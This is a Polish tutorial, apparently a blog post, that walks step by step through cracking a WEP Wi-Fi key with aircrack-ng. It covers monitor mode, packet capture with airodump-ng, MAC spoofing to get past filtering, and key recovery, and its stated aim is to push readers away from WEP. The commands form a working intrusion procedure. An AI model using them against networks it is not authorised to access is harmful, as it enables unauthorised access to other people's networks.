Łamanie klucza WEP

Wpis ten ma na celu pokazanie słabości zabezpieczania sieci wifi kluczem WEP. Mam nadzieję, że niektórych przekona do zmiany szyfrowania na lepsze.
W celu złamania klucza będziemy potrzebowali Linuksa(Ubuntu), bezprzewodowej karty sieciowej oraz odrobiny wolnego czasu ;] Zebranie kilkudziesięciu tysięcy pakietów danych będzie trochę trwało.

1. Instalujemy pakiet aircrack-ng
$ sudo -i
# apt-get update
# apt-get install aircrack-ng


2. Przełączamy kartę sieciową w tryb monitor
Sprawdzamy jak nazywa się nasza karta w systemie :
# ifconfig

eth0 Link encap:Ethernet HWaddr 00:08:54:54:**:**
inet addr:192.168.0.2 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2567 errors:0 dropped:0 overruns:0 frame:0
TX packets:2519 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1973053 (1.9 MB) TX bytes:400436 (400.4 KB)
Interrupt:16 Base address:0xe800

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2 errors:0 dropped:0 overruns:0 frame:0
TX packets:2 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:100 (100.0 B) TX bytes:100 (100.0 B)

wlan0 Link encap:UNSPEC HWaddr 00-18-F3-EE-**-**
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3248 (3.2 KB) TX bytes:1800 (1.8 KB)

Wyłączamy kartę sieciową i zmieniamy jej tryb na monitor:
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up

3. Zaczynamy zbierać pakiety
# airodump-ng wlan0 -w zzrzut.log
Jeżeli znamy kanał na jakim działa interesująca nas sieć to możemy sprecyzować to poleceniem :
# airodump-ng wlan0 -w zzrzut.log --channel 2

BSSID – adresy MAC AP w pobliżu
Beacons – pakiety kontrolne, zbędna dla nas
Data – pakiety danych
CH – kanał na których AP nadają
ENC – sposoby zabezpieczeń
ESSID – to nazwa danej sieci
MB – prędkość z jaką działa sieć
STATION – adres MAC klienta podłączonego do danej sieci. Może się przydać w sytuacji gdy będzie ustawione filtrowanie po MAC adresach.

Żeby złamać klucz WEP 128bit trzeba złapać ok 80-120tyś pakietów DATA.

4. Wracamy do normalnego trybu karty
# ifconfig wlan0 down
# iwconfig wlan0 mode managet
# ifconfig wlan0 up

Jeżeli wiemy, że dostęp do sieci jest dodatkowo zabezpieczony filtrowaniem po MAC adresach możemy łatwo zmienić nasz MAC na dowolny :
Zanim podniesiemy interfejs wpisujemy :
# ifconfig wlan0 hw ether 00:08:c1:3a:6a:77
Dopiero potem podnosimy naszą kartę :
# ifconfig wlan0 up

5. Zdobywamy hasło.
W tym celu posłużymy się programem aircrack-ng
# aircrack-ng -n 128 zzrzut.log-01.cap
Objaśnienie :
-n 128 – określamy jaki klucz chcemy złamać
zzrzut.log-01.cap – plik ze zrzutem z programu airodump-ng

Może odpalić drugą konsolę i co jakiś czas sprawdzać czy zebrana ilość danych starczy do odszyfrowania hasła. Nie musimy wtedy nawet przerywać pracy programu airodump-ng.

W moim przypadku wystarczyło zdobyć tylko 50tyś pakietów danych ale i tak zajęło to 44minuty. Fakt, że użyłem proste hasło i specjalnie generowałem ogromny ruch miało duży wpływ na szybkość zebrania danych.

6. Łączymy się z siecią.
Gdy znamy hasło pozostaje nam już tylko ustanowić połączenie przy pomocy NetworkManager’a.